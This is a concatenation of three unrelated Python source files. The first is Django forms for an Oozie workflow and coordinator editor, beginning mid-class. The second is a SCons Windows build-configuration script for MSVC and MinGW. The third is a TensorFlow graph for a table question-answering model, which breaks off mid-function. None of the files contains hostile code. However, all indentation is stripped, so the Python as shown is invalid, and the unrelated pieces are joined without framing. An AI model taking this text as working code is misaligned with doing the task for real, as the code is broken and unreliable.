self.fields['sub_workflow'] = forms.ChoiceField(choices=choices, widget=forms.RadioSelect(attrs={'class':'radio'}))
class Meta:
model = SubWorkflow
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
}
def clean_sub_workflow(self):
try:
return Workflow.objects.get(id=int(self.cleaned_data.get('sub_workflow')))
except Exception, e:
raise ValidationError(_('The sub-workflow could not be found: %s' % e))
class GenericForm(forms.ModelForm):
class Meta:
model = Generic
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'xml': forms.Textarea(attrs={'class': 'span8'})
}
class LinkForm(forms.ModelForm):
comment = forms.CharField(label='if', max_length=1024, required=True, widget=forms.TextInput(attrs={'class': 'span8'}))
class Meta:
model = Link
exclude = NodeForm.Meta.ALWAYS_HIDE + ('parent', 'child', 'name')
class DefaultLinkForm(forms.ModelForm):
class Meta:
model = Link
exclude = NodeForm.Meta.ALWAYS_HIDE + ('parent', 'comment', 'name')
def __init__(self, *args, **kwargs):
workflow = kwargs['action'].workflow
del kwargs['action']
super(DefaultLinkForm, self).__init__(*args, **kwargs)
self.fields['child'].widget = forms.Select(choices=((node.id, node) for node in set(workflow.node_set.all())))
DATE_FORMAT = '%m/%d/%Y'
TIME_FORMAT = '%I:%M %p'
class NumberInput(TextInput):
input_type = 'number'
class CoordinatorForm(forms.ModelForm):
start = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'coordinator_start'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
end = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'coordinator_end'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
class Meta:
model = Coordinator
exclude = ('owner', 'deployment_dir')
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'parameters': forms.widgets.HiddenInput(),
'job_properties': forms.widgets.HiddenInput(),
'schema_version': forms.widgets.HiddenInput(),
'timeout': NumberInput(),
}
def __init__(self, *args, **kwargs):
user = kwargs['user']
del kwargs['user']
super(CoordinatorForm, self).__init__(*args, **kwargs)
qs = Workflow.objects.available().filter(Q(is_shared=True) | Q(owner=user))
workflows = []
for workflow in qs:
if workflow.is_accessible(user):
workflows.append(workflow.id)
qs = qs.filter(id__in=workflows)
self.fields['workflow'].queryset = qs
class DatasetForm(forms.ModelForm):
start = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'short'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
class Meta:
model = Dataset
exclude = ('coordinator')
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'uri': forms.TextInput(attrs={'class': 'span5'}),
}
def __init__(self, *args, **kwargs):
super(DatasetForm, self).__init__(*args, **kwargs)
class DataInputForm(forms.ModelForm):
class Meta:
model = DataInput
exclude = ('coordinator')
def __init__(self, *args, **kwargs):
coordinator = kwargs['coordinator']
del kwargs['coordinator']
super(DataInputForm, self).__init__(*args, **kwargs)
self.fields['dataset'].queryset = Dataset.objects.filter(coordinator=coordinator)
if coordinator.workflow:
self.fields['name'].widget = forms.Select(choices=((param, param) for param in set(coordinator.workflow.find_parameters())))
class DataOutputForm(forms.ModelForm):
class Meta:
model = DataOutput
exclude = ('coordinator')
def __init__(self, *args, **kwargs):
coordinator = kwargs['coordinator']
del kwargs['coordinator']
super(DataOutputForm, self).__init__(*args, **kwargs)
self.fields['dataset'].queryset = Dataset.objects.filter(coordinator=coordinator)
if coordinator.workflow:
self.fields['name'].widget = forms.Select(choices=((param, param) for param in set(coordinator.workflow.find_parameters())))
_node_type_TO_FORM_CLS = {
Mapreduce.node_type: MapreduceForm,
Streaming.node_type: StreamingForm,
Java.node_type: JavaForm,
Pig.node_type: PigForm,
Hive.node_type: HiveForm,
Sqoop.node_type: SqoopForm,
Ssh.node_type: SshForm,
Shell.node_type: ShellForm,
DistCp.node_type: DistCpForm,
Fs.node_type: FsForm,
Email.node_type: EmailForm,
SubWorkflow.node_type: SubWorkflowForm,
Generic.node_type: GenericForm,
}
class RerunForm(forms.Form):
skip_nodes = forms.MultipleChoiceField(required=False)
def __init__(self, *args, **kwargs):
oozie_workflow = kwargs.pop('oozie_workflow')
# Build list of skip nodes
decisions = filter(lambda node: node.type == 'switch', oozie_workflow.get_control_flow_actions())
working_actions = oozie_workflow.get_working_actions()
skip_nodes = []
for action in decisions + working_actions:
if action.status == 'OK':
skip_nodes.append((action.name, action.name))
initial_skip_nodes = oozie_workflow.conf_dict.get('oozie.wf.rerun.skip.nodes', '').split()
super(RerunForm, self).__init__(*args, **kwargs)
self.fields['skip_nodes'].choices = skip_nodes
self.fields['skip_nodes'].initial = initial_skip_nodes
class RerunCoordForm(forms.Form):
refresh = forms.BooleanField(initial=True, required=False, help_text=_t('Used to indicate if user wants to cleanup output events for given rerun actions'))
nocleanup = forms.BooleanField(initial=True, required=False, help_text=_t("Used to indicate if user wants to refresh an action's input and output events"))
actions = forms.MultipleChoiceField(required=True)
def __init__(self, *args, **kwargs):
oozie_coordinator = kwargs.pop('oozie_coordinator')
super(RerunCoordForm, self).__init__(*args, **kwargs)
self.fields['actions'].choices = [(action.actionNumber, action.title) for action in reversed(oozie_coordinator.get_working_actions())]
class RerunBundleForm(forms.Form):
refresh = forms.BooleanField(initial=True, required=False, help_text=_t('Used to indicate if user wants to cleanup output events for given rerun actions'))
nocleanup = forms.BooleanField(initial=True, required=False, help_text=_t("Used to indicate if user wants to refresh an action's input and output events"))
coordinators = forms.MultipleChoiceField(required=True)
start = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT], required=False, initial=datetime.today(),
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'rerun_start'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
end = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT], required=False, initial=datetime.today() + timedelta(days=3),
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'rerun_end'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
def __init__(self, *args, **kwargs):
oozie_bundle = kwargs.pop('oozie_bundle')
super(RerunBundleForm, self).__init__(*args, **kwargs)
self.fields['coordinators'].choices = [(action.name, action.name) for action in reversed(oozie_bundle.actions)]
self.fields['coordinators'].initial = [action.name for action in reversed(oozie_bundle.actions)]
class BundledCoordinatorForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(BundledCoordinatorForm, self).__init__(*args, **kwargs)
self.fields['coordinator'].empty_label = None
class Meta:
model = BundledCoordinator
exclude = ('bundle',)
widgets = {
'parameters': forms.widgets.HiddenInput(),
}
class BundleForm(forms.ModelForm):
kick_off_time = forms.SplitDateTimeField(input_time_formats=[TIME_FORMAT],
widget=SplitDateTimeWidget(attrs={'class': 'input-small', 'id': 'bundle_kick_off_time'},
date_format=DATE_FORMAT, time_format=TIME_FORMAT))
class Meta:
model = Bundle
exclude = ('owner', 'coordinators')
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'parameters': forms.widgets.HiddenInput(),
'schema_version': forms.widgets.HiddenInput(),
}
def design_form_by_type(node_type, user, workflow):
klass_form = _node_type_TO_FORM_CLS[node_type]
if node_type == 'subworkflow':
klass_form = curry(klass_form, user=user, workflow=workflow)
return klass_form
def design_form_by_instance(design_obj, data=None):
action_obj = design_obj.get_root_action()
cls = _node_type_TO_FORM_CLS[action_obj.node_type]
instances = dict(wf=design_obj, action=action_obj)
res = MultiForm(wf=WorkflowForm, action=cls)
res.bind(data=data, instances=instances)
return res
|
|
#
# tested on | Windows native | Linux cross-compilation
# ------------------------+-------------------+---------------------------
# MSVS C++ 2010 Express | WORKS | n/a
# Mingw-w64 | WORKS | WORKS
# Mingw-w32 | WORKS | WORKS
# MinGW | WORKS | untested
#
#####
# Notes about MSVS C++ :
#
# - MSVC2010-Express compiles to 32bits only.
#
#####
# Notes about Mingw-w64 and Mingw-w32 under Windows :
#
# - both can be installed using the official installer :
# http://mingw-w64.sourceforge.net/download.php#mingw-builds
#
# - if you want to compile both 32bits and 64bits, don't forget to
# run the installer twice to install them both.
#
# - install them into a path that does not contain spaces
# ( example : "C:/Mingw-w32", "C:/Mingw-w64" )
#
# - if you want to compile faster using the "-j" option, don't forget
# to install the appropriate version of the Pywin32 python extension
# available from : http://sourceforge.net/projects/pywin32/files/
#
# - before running scons, you must add into the environment path
# the path to the "/bin" directory of the Mingw version you want
# to use :
#
# set PATH=C:/Mingw-w32/bin;%PATH%
#
# - then, scons should be able to detect gcc.
# - Mingw-w32 only compiles 32bits.
# - Mingw-w64 only compiles 64bits.
#
# - it is possible to add them both at the same time into the PATH env,
# if you also define the MINGW32_PREFIX and MINGW64_PREFIX environment
# variables.
# For instance, you could store that set of commands into a .bat script
# that you would run just before scons :
#
# set PATH=C:\mingw-w32\bin;%PATH%
# set PATH=C:\mingw-w64\bin;%PATH%
# set MINGW32_PREFIX=C:\mingw-w32\bin\
# set MINGW64_PREFIX=C:\mingw-w64\bin\
#
#####
# Notes about Mingw, Mingw-w64 and Mingw-w32 under Linux :
#
# - default toolchain prefixes are :
# "i586-mingw32msvc-" for MinGW
# "i686-w64-mingw32-" for Mingw-w32
# "x86_64-w64-mingw32-" for Mingw-w64
#
# - if both MinGW and Mingw-w32 are installed on your system
# Mingw-w32 should take the priority over MinGW.
#
# - it is possible to manually override prefixes by defining
# the MINGW32_PREFIX and MINGW64_PREFIX environment variables.
#
#####
# Notes about Mingw under Windows :
#
# - this is the MinGW version from http://mingw.org/
# - install it into a path that does not contain spaces
# ( example : "C:/MinGW" )
# - several DirectX headers might be missing. You can copy them into
# the C:/MinGW/include" directory from this page :
# https://code.google.com/p/mingw-lib/source/browse/trunk/working/avcodec_to_widget_5/directx_include/
# - before running scons, add the path to the "/bin" directory :
# set PATH=C:/MinGW/bin;%PATH%
# - scons should be able to detect gcc.
#
#####
# TODO :
#
# - finish to cleanup this script to remove all the remains of previous hacks and workarounds
# - make it work with the Windows7 SDK that is supposed to enable 64bits compilation for MSVC2010-Express
# - confirm it works well with other Visual Studio versions.
# - update the wiki about the pywin32 extension required for the "-j" option under Windows.
# - update the wiki to document MINGW32_PREFIX and MINGW64_PREFIX
#
import os
import sys
def is_active():
return True
def get_name():
return "Windows"
def can_build():
if (os.name=="nt"):
#building natively on windows!
if (os.getenv("VSINSTALLDIR")):
return True
else:
print("\nMSVC not detected, attempting Mingw.")
mingw32 = ""
mingw64 = ""
if ( os.getenv("MINGW32_PREFIX") ) :
mingw32 = os.getenv("MINGW32_PREFIX")
if ( os.getenv("MINGW64_PREFIX") ) :
mingw64 = os.getenv("MINGW64_PREFIX")
test = "gcc --version > NUL 2>&1"
if os.system(test)!= 0 and os.system(mingw32+test)!=0 and os.system(mingw64+test)!=0 :
print("- could not detect gcc.")
print("Please, make sure a path to a Mingw /bin directory is accessible into the environment PATH.\n")
return False
else:
print("- gcc detected.")
return True
if (os.name=="posix"):
mingw = "i586-mingw32msvc-"
mingw64 = "x86_64-w64-mingw32-"
mingw32 = "i686-w64-mingw32-"
if (os.getenv("MINGW32_PREFIX")):
mingw32=os.getenv("MINGW32_PREFIX")
mingw = mingw32
if (os.getenv("MINGW64_PREFIX")):
mingw64=os.getenv("MINGW64_PREFIX")
test = "gcc --version &>/dev/null"
if (os.system(mingw+test) == 0 or os.system(mingw64+test) == 0 or os.system(mingw32+test) == 0):
return True
return False
def get_opts():
mingw=""
mingw32=""
mingw64=""
if ( os.name == "posix" ):
mingw = "i586-mingw32msvc-"
mingw32 = "i686-w64-mingw32-"
mingw64 = "x86_64-w64-mingw32-"
if os.system(mingw32+"gcc --version &>/dev/null") != 0 :
mingw32 = mingw
if (os.getenv("MINGW32_PREFIX")):
mingw32=os.getenv("MINGW32_PREFIX")
mingw = mingw32
if (os.getenv("MINGW64_PREFIX")):
mingw64=os.getenv("MINGW64_PREFIX")
return [
('mingw_prefix','Mingw Prefix',mingw32),
('mingw_prefix_64','Mingw Prefix 64 bits',mingw64),
]
def get_flags():
return [
('freetype','builtin'), #use builtin freetype
('openssl','builtin'), #use builtin openssl
('theora','no'),
]
def configure(env):
env.Append(CPPPATH=['#platform/windows'])
if (os.name=="nt" and os.getenv("VSINSTALLDIR")!=None):
#build using visual studio
env['ENV']['TMP'] = os.environ['TMP']
env.Append(CPPPATH=['#platform/windows/include'])
env.Append(LIBPATH=['#platform/windows/lib'])
if (env["freetype"]!="no"):
env.Append(CCFLAGS=['/DFREETYPE_ENABLED'])
env.Append(CPPPATH=['#tools/freetype'])
env.Append(CPPPATH=['#tools/freetype/freetype/include'])
if (env["target"]=="release"):
env.Append(CCFLAGS=['/O2'])
env.Append(LINKFLAGS=['/SUBSYSTEM:WINDOWS'])
env.Append(LINKFLAGS=['/ENTRY:mainCRTStartup'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['/O2','/DDEBUG_ENABLED'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
elif (env["target"]=="debug_release"):
env.Append(CCFLAGS=['/Zi','/Od'])
env.Append(LINKFLAGS=['/DEBUG'])
env.Append(LINKFLAGS=['/SUBSYSTEM:WINDOWS'])
env.Append(LINKFLAGS=['/ENTRY:mainCRTStartup'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['/Zi','/DDEBUG_ENABLED','/DDEBUG_MEMORY_ENABLED','/DD3D_DEBUG_INFO','/Od'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
env.Append(LINKFLAGS=['/DEBUG'])
env.Append(CCFLAGS=['/MT','/Gd','/GR','/nologo'])
env.Append(CXXFLAGS=['/TP'])
env.Append(CPPFLAGS=['/DMSVC', '/GR', ])
env.Append(CCFLAGS=['/I'+os.getenv("WindowsSdkDir")+"/Include"])
env.Append(CCFLAGS=['/DWINDOWS_ENABLED'])
env.Append(CCFLAGS=['/DRTAUDIO_ENABLED'])
env.Append(CCFLAGS=['/DWIN32'])
env.Append(CCFLAGS=['/DTYPED_METHOD_BIND'])
env.Append(CCFLAGS=['/DGLES2_ENABLED'])
env.Append(CCFLAGS=['/DGLEW_ENABLED'])
LIBS=['winmm','opengl32','dsound','kernel32','ole32','user32','gdi32', 'IPHLPAPI','Shlwapi', 'wsock32', 'shell32','advapi32']
env.Append(LINKFLAGS=[p+env["LIBSUFFIX"] for p in LIBS])
env.Append(LIBPATH=[os.getenv("WindowsSdkDir")+"/Lib"])
if (os.getenv("DXSDK_DIR")):
DIRECTX_PATH=os.getenv("DXSDK_DIR")
else:
DIRECTX_PATH="C:/Program Files/Microsoft DirectX SDK (March 2009)"
if (os.getenv("VCINSTALLDIR")):
VC_PATH=os.getenv("VCINSTALLDIR")
else:
VC_PATH=""
env.Append(CCFLAGS=["/I" + p for p in os.getenv("INCLUDE").split(";")])
env.Append(LIBPATH=[p for p in os.getenv("LIB").split(";")])
env.Append(CCFLAGS=["/I"+DIRECTX_PATH+"/Include"])
env.Append(LIBPATH=[DIRECTX_PATH+"/Lib/x86"])
env['ENV'] = os.environ;
else:
# Workaround for MinGW. See:
# http://www.scons.org/wiki/LongCmdLinesOnWin32
if (os.name=="nt"):
import subprocess
def mySubProcess(cmdline,env):
#print "SPAWNED : " + cmdline
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, startupinfo=startupinfo, shell = False, env = env)
data, err = proc.communicate()
rv = proc.wait()
if rv:
print "====="
print err
print "====="
return rv
def mySpawn(sh, escape, cmd, args, env):
newargs = ' '.join(args[1:])
cmdline = cmd + " " + newargs
rv=0
if len(cmdline) > 32000 and cmd.endswith("ar") :
cmdline = cmd + " " + args[1] + " " + args[2] + " "
for i in range(3,len(args)) :
rv = mySubProcess( cmdline + args[i], env )
if rv :
break
else:
rv = mySubProcess( cmdline, env )
return rv
env['SPAWN'] = mySpawn
#build using mingw
if (os.name=="nt"):
env['ENV']['TMP'] = os.environ['TMP'] #way to go scons, you can be so stupid sometimes
else:
env["PROGSUFFIX"]=env["PROGSUFFIX"]+".exe" # for linux cross-compilation
mingw_prefix=""
if (env["bits"]=="default"):
env["bits"]="32"
if (env["bits"]=="32"):
env.Append(LINKFLAGS=['-static'])
env.Append(LINKFLAGS=['-static-libgcc'])
env.Append(LINKFLAGS=['-static-libstdc++'])
mingw_prefix=env["mingw_prefix"];
else:
env.Append(LINKFLAGS=['-static'])
mingw_prefix=env["mingw_prefix_64"];
nulstr=""
if (os.name=="posix"):
nulstr=">/dev/null"
else:
nulstr=">nul"
# if os.system(mingw_prefix+"gcc --version"+nulstr)!=0:
# #not really super consistent but..
# print("Can't find Windows compiler: "+mingw_prefix)
# sys.exit(255)
if (env["target"]=="release"):
env.Append(CCFLAGS=['-O3','-ffast-math','-fomit-frame-pointer','-msse2'])
env.Append(LINKFLAGS=['-Wl,--subsystem,windows'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['-O2','-DDEBUG_ENABLED'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['-g', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED'])
if (env["freetype"]!="no"):
env.Append(CCFLAGS=['-DFREETYPE_ENABLED'])
env.Append(CPPPATH=['#tools/freetype'])
env.Append(CPPPATH=['#tools/freetype/freetype/include'])
env["CC"]=mingw_prefix+"gcc"
env['AS']=mingw_prefix+"as"
env['CXX'] = mingw_prefix+"g++"
env['AR'] = mingw_prefix+"ar"
env['RANLIB'] = mingw_prefix+"ranlib"
env['LD'] = mingw_prefix+"g++"
#env['CC'] = "winegcc"
#env['CXX'] = "wineg++"
env.Append(CCFLAGS=['-DWINDOWS_ENABLED','-mwindows'])
env.Append(CPPFLAGS=['-DRTAUDIO_ENABLED'])
env.Append(CCFLAGS=['-DGLES2_ENABLED','-DGLEW_ENABLED'])
env.Append(LIBS=['mingw32','opengl32', 'dsound', 'ole32', 'd3d9','winmm','gdi32','iphlpapi','shlwapi','wsock32','kernel32'])
# if (env["bits"]=="32"):
# # env.Append(LIBS=['gcc_s'])
# #--with-arch=i686
# env.Append(CPPFLAGS=['-march=i686'])
# env.Append(LINKFLAGS=['-march=i686'])
#'d3dx9d'
env.Append(CPPFLAGS=['-DMINGW_ENABLED'])
env.Append(LINKFLAGS=['-g'])
import methods
env.Append( BUILDERS = { 'GLSL120' : env.Builder(action = methods.build_legacygl_headers, suffix = 'glsl.h',src_suffix = '.glsl') } )
env.Append( BUILDERS = { 'GLSL' : env.Builder(action = methods.build_glsl_headers, suffix = 'glsl.h',src_suffix = '.glsl') } )
env.Append( BUILDERS = { 'HLSL9' : env.Builder(action = methods.build_hlsl_dx9_headers, suffix = 'hlsl.h',src_suffix = '.hlsl') } )
env.Append( BUILDERS = { 'GLSL120GLES' : env.Builder(action = methods.build_gles2_headers, suffix = 'glsl.h',src_suffix = '.glsl') } )
|
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Author: aneelakantan (Arvind Neelakantan)
"""
import numpy as np
import tensorflow as tf
import nn_utils
class Graph():
def __init__(self, utility, batch_size, max_passes, mode="train"):
self.utility = utility
self.data_type = self.utility.tf_data_type[self.utility.FLAGS.data_type]
self.max_elements = self.utility.FLAGS.max_elements
max_elements = self.utility.FLAGS.max_elements
self.num_cols = self.utility.FLAGS.max_number_cols
self.num_word_cols = self.utility.FLAGS.max_word_cols
self.question_length = self.utility.FLAGS.question_length
self.batch_size = batch_size
self.max_passes = max_passes
self.mode = mode
self.embedding_dims = self.utility.FLAGS.embedding_dims
#input question and a mask
self.batch_question = tf.placeholder(tf.int32,
[batch_size, self.question_length])
self.batch_question_attention_mask = tf.placeholder(
self.data_type, [batch_size, self.question_length])
#ground truth scalar answer and lookup answer
self.batch_answer = tf.placeholder(self.data_type, [batch_size])
self.batch_print_answer = tf.placeholder(
self.data_type,
[batch_size, self.num_cols + self.num_word_cols, max_elements])
#number columns and its processed version
self.batch_number_column = tf.placeholder(
self.data_type, [batch_size, self.num_cols, max_elements
]) #columns with numeric entries
self.batch_processed_number_column = tf.placeholder(
self.data_type, [batch_size, self.num_cols, max_elements])
self.batch_processed_sorted_index_number_column = tf.placeholder(
tf.int32, [batch_size, self.num_cols, max_elements])
#word columns and its processed version
self.batch_processed_word_column = tf.placeholder(
self.data_type, [batch_size, self.num_word_cols, max_elements])
self.batch_processed_sorted_index_word_column = tf.placeholder(
tf.int32, [batch_size, self.num_word_cols, max_elements])
self.batch_word_column_entry_mask = tf.placeholder(
tf.int32, [batch_size, self.num_word_cols, max_elements])
#names of word and number columns along with their mask
self.batch_word_column_names = tf.placeholder(
tf.int32,
[batch_size, self.num_word_cols, self.utility.FLAGS.max_entry_length])
self.batch_word_column_mask = tf.placeholder(
self.data_type, [batch_size, self.num_word_cols])
self.batch_number_column_names = tf.placeholder(
tf.int32,
[batch_size, self.num_cols, self.utility.FLAGS.max_entry_length])
self.batch_number_column_mask = tf.placeholder(self.data_type,
[batch_size, self.num_cols])
#exact match and group by max operation
self.batch_exact_match = tf.placeholder(
self.data_type,
[batch_size, self.num_cols + self.num_word_cols, max_elements])
self.batch_column_exact_match = tf.placeholder(
self.data_type, [batch_size, self.num_cols + self.num_word_cols])
self.batch_group_by_max = tf.placeholder(
self.data_type,
[batch_size, self.num_cols + self.num_word_cols, max_elements])
#numbers in the question along with their position. This is used to compute arguments to the comparison operations
self.batch_question_number = tf.placeholder(self.data_type, [batch_size, 1])
self.batch_question_number_one = tf.placeholder(self.data_type,
[batch_size, 1])
self.batch_question_number_mask = tf.placeholder(
self.data_type, [batch_size, max_elements])
self.batch_question_number_one_mask = tf.placeholder(self.data_type,
[batch_size, 1])
self.batch_ordinal_question = tf.placeholder(
self.data_type, [batch_size, self.question_length])
self.batch_ordinal_question_one = tf.placeholder(
self.data_type, [batch_size, self.question_length])
def LSTM_question_embedding(self, sentence, sentence_length):
#LSTM processes the input question
lstm_params = "question_lstm"
hidden_vectors = []
sentence = self.batch_question
question_hidden = tf.zeros(
[self.batch_size, self.utility.FLAGS.embedding_dims], self.data_type)
question_c_hidden = tf.zeros(
[self.batch_size, self.utility.FLAGS.embedding_dims], self.data_type)
if (self.utility.FLAGS.rnn_dropout > 0.0):
if (self.mode == "train"):
rnn_dropout_mask = tf.cast(
tf.random_uniform(
tf.shape(question_hidden), minval=0.0, maxval=1.0) <
self.utility.FLAGS.rnn_dropout,
self.data_type) / self.utility.FLAGS.rnn_dropout
else:
rnn_dropout_mask = tf.ones_like(question_hidden)
for question_iterator in range(self.question_length):
curr_word = sentence[:, question_iterator]
question_vector = nn_utils.apply_dropout(
nn_utils.get_embedding(curr_word, self.utility, self.params),
self.utility.FLAGS.dropout, self.mode)
question_hidden, question_c_hidden = nn_utils.LSTMCell(
question_vector, question_hidden, question_c_hidden, lstm_params,
self.params)
if (self.utility.FLAGS.rnn_dropout > 0.0):
question_hidden = question_hidden * rnn_dropout_mask
hidden_vectors.append(tf.expand_dims(question_hidden, 0))
hidden_vectors = tf.concat(0, hidden_vectors)
return question_hidden, hidden_vectors
def history_recurrent_step(self, curr_hprev, hprev):
#A single RNN step for controller or history RNN
return tf.tanh(
tf.matmul(
tf.concat(1, [hprev, curr_hprev]), self.params[
"history_recurrent"])) + self.params["history_recurrent_bias"]
def question_number_softmax(self, hidden_vectors):
#Attention on quetsion to decide the question number to passed to comparison ops
def compute_ans(op_embedding, comparison):
op_embedding = tf.expand_dims(op_embedding, 0)
#dot product of operation embedding with hidden state to the left of the number occurence
first = tf.transpose(
tf.matmul(op_embedding,
tf.transpose(
tf.reduce_sum(hidden_vectors * tf.tile(
tf.expand_dims(
tf.transpose(self.batch_ordinal_question), 2),
[1, 1, self.utility.FLAGS.embedding_dims]), 0))))
second = self.batch_question_number_one_mask + tf.transpose(
tf.matmul(op_embedding,
tf.transpose(
tf.reduce_sum(hidden_vectors * tf.tile(
tf.expand_dims(
tf.transpose(self.batch_ordinal_question_one), 2
), [1, 1, self.utility.FLAGS.embedding_dims]), 0))))
question_number_softmax = tf.nn.softmax(tf.concat(1, [first, second]))
if (self.mode == "test"):
cond = tf.equal(question_number_softmax,
tf.reshape(
tf.reduce_max(question_number_softmax, 1),
[self.batch_size, 1]))
question_number_softmax = tf.select(
cond,
tf.fill(tf.shape(question_number_softmax), 1.0),
tf.fill(tf.shape(question_number_softmax), 0.0))
question_number_softmax = tf.cast(question_number_softmax,
self.data_type)
ans = tf.reshape(
tf.reduce_sum(question_number_softmax * tf.concat(
1, [self.batch_question_number, self.batch_question_number_one]),
1), [self.batch_size, 1])
return ans
def compute_op_position(op_name):
for i in range(len(self.utility.operations_set)):
if (op_name == self.utility.operations_set[i]):
return i
def compute_question_number(op_name):
op_embedding = tf.nn.embedding_lookup(self.params_unit,
compute_op_position(op_name))
return compute_ans(op_embedding, op_name)
curr_greater_question_number = compute_question_number("greater")
curr_lesser_question_number = compute_question_number("lesser")
curr_geq_question_number = compute_question_number("geq")
curr_leq_question_number = compute_question_number("leq")
return curr_greater_question_number, curr_lesser_question_number, curr_geq_question_number, curr_leq_question_number
def perform_attention(self, context_vector, hidden_vectors, length, mask):
#Performs attention on hiddent_vectors using context vector
context_vector = tf.tile(
tf.expand_dims(context_vector, 0), [length, 1, 1]) #time * bs * d
attention_softmax = tf.nn.softmax(
tf.transpose(tf.reduce_sum(context_vector * hidden_vectors, 2)) +
mask) #batch_size * time
attention_softmax = tf.tile(
tf.expand_dims(tf.transpose(attention_softmax), 2),
[1, 1, self.embedding_dims])
ans_vector = tf.reduce_sum(attention_softmax * hidden_vectors, 0)
return ans_vector
#computes embeddings for column names using parameters of question module
def get_column_hidden_vectors(self):
#vector representations for the column names
self.column_hidden_vectors = tf.reduce_sum(
nn_utils.get_embedding(self.batch_number_column_names, self.utility,
self.params), 2)
self.word_column_hidden_vectors = tf.reduce_sum(
nn_utils.get_embedding(self.batch_word_column_names, self.utility,
self.params), 2)
def create_summary_embeddings(self):
#embeddings for each text entry in the table using parameters of the question module
self.summary_text_entry_embeddings = tf.reduce_sum(
tf.expand_dims(self.batch_exact_match, 3) * tf.expand_dims(
tf.expand_dims(
tf.expand_dims(
nn_utils.get_embedding(self.utility.entry_match_token_id,
self.utility, self.params), 0), 1),
2), 2)
def compute_column_softmax(self, column_controller_vector, time_step):
#compute softmax over all the columns using column controller vector
column_controller_vector = tf.tile(
tf.expand_dims(column_controller_vector, 1),
[1, self.num_cols + self.num_word_cols, 1]) #max_cols * bs * d
column_controller_vector = nn_utils.apply_dropout(
column_controller_vector, self.utility.FLAGS.dropout, self.mode)
self.full_column_hidden_vectors = tf.concat(
1, [self.column_hidden_vectors, self.word_column_hidden_vectors])
self.full_column_hidden_vectors += self.summary_text_entry_embeddings
self.full_column_hidden_vectors = nn_utils.apply_dropout(
self.full_column_hidden_vectors, self.utility.FLAGS.dropout, self.mode)
column_logits = tf.reduce_sum(
column_controller_vector * self.full_column_hidden_vectors, 2) + (
self.params["word_match_feature_column_name"] *
self.batch_column_exact_match) + self.full_column_mask
column_softmax = tf.nn.softmax(column_logits) #batch_size * max_cols
return column_softmax
def compute_first_or_last(self, select, first=True):
#perform first ot last operation on row select with probabilistic row selection
answer = tf.zeros_like(select)
running_sum = tf.zeros([self.batch_size, 1], self.data_type)
for i in range(self.max_elements):
if (first):
current = tf.slice(select, [0, i], [self.batch_size, 1])
else:
current = tf.slice(select, [0, self.max_elements - 1 - i],
[self.batch_size, 1])
curr_prob = current * (1 - running_sum)
curr_prob = curr_prob * tf.cast(curr_prob >= 0.0, self.data_type)
running_sum += curr_prob
temp_ans = []
curr_prob = tf.expand_dims(tf.reshape(curr_prob, [self.batch_size]), 0)
for i_ans in range(self.max_elements):
if (not (first) and i_ans == self.max_elements - 1 - i):
temp_ans.append(curr_prob)
elif (first and i_ans == i):
temp_ans.append(curr_prob)
else:
temp_ans.append(tf.zeros_like(curr_prob))
temp_ans = tf.transpose(tf.concat(0, temp_ans))
answer += temp_ans
return answer
def make_hard_softmax(self, softmax):
#converts soft selection to hard selection. used at test time
cond = tf.equal(
softmax, tf.reshape(tf.reduce_max(softmax, 1), [self.batch_size, 1]))
softmax = tf.select(
cond, tf.fill(tf.shape(softmax), 1.0), tf.fill(tf.shape(softmax), 0.0))
softmax = tf.cast(softmax, self.data_type)
return softmax
def compute_max_or_min(self, select, maxi=True):
#computes the argmax and argmin of a column with probabilistic row selection
answer = tf.zeros([
self.batch_size, self.num_cols + self.num_word_cols, self.max_elements
], self.data_type)
sum_prob = tf.zeros([self.batch_size, self.num_cols + self.num_word_cols],
self.data_type)
for j in range(self.max_elements):
if (maxi):
curr_pos = j
else:
curr_pos = self.max_elements - 1 - j
select_index = tf.slice(self.full_processed_sorted_index_column,
[0, 0, curr_pos], [self.batch_size, -1, 1])
select_mask = tf.equal(
tf.tile(
tf.expand_dims(
tf.tile(
tf.expand_dims(tf.range(self.max_elements), 0),
[self.batch_size, 1]), 1),
[1, self.num_cols + self.num_word_cols, 1]), select_index)
curr_prob = tf.expand_dims(select, 1) * tf.cast(
select_mask, self.data_type) * self.select_bad_number_mask
